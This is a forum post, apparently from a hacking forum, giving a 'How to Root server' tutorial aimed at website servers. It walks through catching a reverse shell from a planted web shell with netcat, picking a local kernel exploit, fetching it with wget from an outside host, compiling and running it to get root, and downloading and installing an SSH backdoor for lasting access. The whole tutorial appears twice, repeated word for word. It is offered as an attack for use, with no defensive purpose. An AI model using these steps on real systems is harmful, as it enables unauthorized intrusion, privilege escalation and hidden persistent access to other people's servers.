Skeptik
Well-Known Member
- Joined
- Dec 11, 2012
- Messages
- 146
- Reaction score
- 0
How to Root server... Tutorial by_Maruf Alam
Special thanks: Ransford Key West
and all anonnymouse friend.
Things you need:
# A Shell on a Website
# An Exploit
# Putty
# Ssh Backdoor
# Netcat
# A Brain
U can search http://www.google.com/ for more except brain.
(*) Getting Back Connection to the servers
Open command prompt, and go to NetCat Path, Type "cd netcat.exe"
ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "GNY" or Any other thats your choice....
I like GNY shell. R57 is good for command.
Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.
now came back to netcat and type "nc -l -v -p 2121"
it will give you this output:
c:\netcat>nc -l -v -p 2121 listening on [any] 2121 ...
(*) Getting a Right exploit for the servers
Type : Uname -a & hit enter. It'll look something like this:
Code: [admin@www.target.com / home/saijyoti/public_html/ cgi-bin]$ uname -a Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
You have noted, It shows the kernal version of the server is:
2.6.18-194.26.1.el5 & Year is 2010.
You need to find a perfect exploit for it. you can find them at:
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com
after found exploit u need to compiling and excuting.
(*)Compiling & executing exploits
Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.
Before proceeding further, Cd into the tmp directory, because it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.
So first I'll get the exploit on the server, So I type :
Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you. It'll look something Like this:-
Code: admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43--
http://exploitsite.net/2010-exploits/exploit.c
Resolving
www.exploitsite.net
... 199.58.192.192
Connecting to www.exploitsite.net | 199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/ x-csrc] Saving to: `exploit.c
now change the permission of the exploit to 777. Type: "Chmod 777 exploit.c"'
wow! Now the exploit is On my server, I just need to compile & execute it. So, I'll give the command:
"gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit
Next step is to execute it So we'll type: "./exploit"
here it'll show different process...
: #
: #
got root you m0f0 !! [<example]
Now it say got root. Let's Check is it true, Type: "whoami"
then it will say "root"
like: uid=0(root) gid=0(root) groups=0(root)
type "su" to get full privilages ! =))
(*) Installing Backdoors
type:
"Wget http://www.urlofbackdoor.com/sshdoor.zip"
Then Type, Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port ^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges....
Special thanks: Ransford Key West
and all anonnymouse friend.
Things you need:
# A Shell on a Website
# An Exploit
# Putty
# Ssh Backdoor
# Netcat
# A Brain
U can search http://www.google.com/ for more except brain.
(*) Getting Back Connection to the servers
Open command prompt, and go to NetCat Path, Type "cd netcat.exe"
ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "GNY" or Any other thats your choice....
I like GNY shell. R57 is good for command.
Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.
now came back to netcat and type "nc -l -v -p 2121"
it will give you this output:
c:\netcat>nc -l -v -p 2121 listening on [any] 2121 ...
(*) Getting a Right exploit for the servers
Type : Uname -a & hit enter. It'll look something like this:
Code: [admin@www.target.com / home/saijyoti/public_html/ cgi-bin]$ uname -a Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
You have noted, It shows the kernal version of the server is:
2.6.18-194.26.1.el5 & Year is 2010.
You need to find a perfect exploit for it. you can find them at:
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com
after found exploit u need to compiling and excuting.
(*)Compiling & executing exploits
Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.
Before proceeding further, Cd into the tmp directory, because it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.
So first I'll get the exploit on the server, So I type :
Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you. It'll look something Like this:-
Code: admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43--
http://exploitsite.net/2010-exploits/exploit.c
Resolving
www.exploitsite.net
... 199.58.192.192
Connecting to www.exploitsite.net | 199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/ x-csrc] Saving to: `exploit.c
now change the permission of the exploit to 777. Type: "Chmod 777 exploit.c"'
wow! Now the exploit is On my server, I just need to compile & execute it. So, I'll give the command:
"gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit
Next step is to execute it So we'll type: "./exploit"
here it'll show different process...
: #
: #
got root you m0f0 !! [<example]
Now it say got root. Let's Check is it true, Type: "whoami"
then it will say "root"
like: uid=0(root) gid=0(root) groups=0(root)
type "su" to get full privilages ! =))
(*) Installing Backdoors
type:
"Wget http://www.urlofbackdoor.com/sshdoor.zip"
Then Type, Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port ^ replace pass with your password, & a port.
Now connect with putty & enjoy root privileges....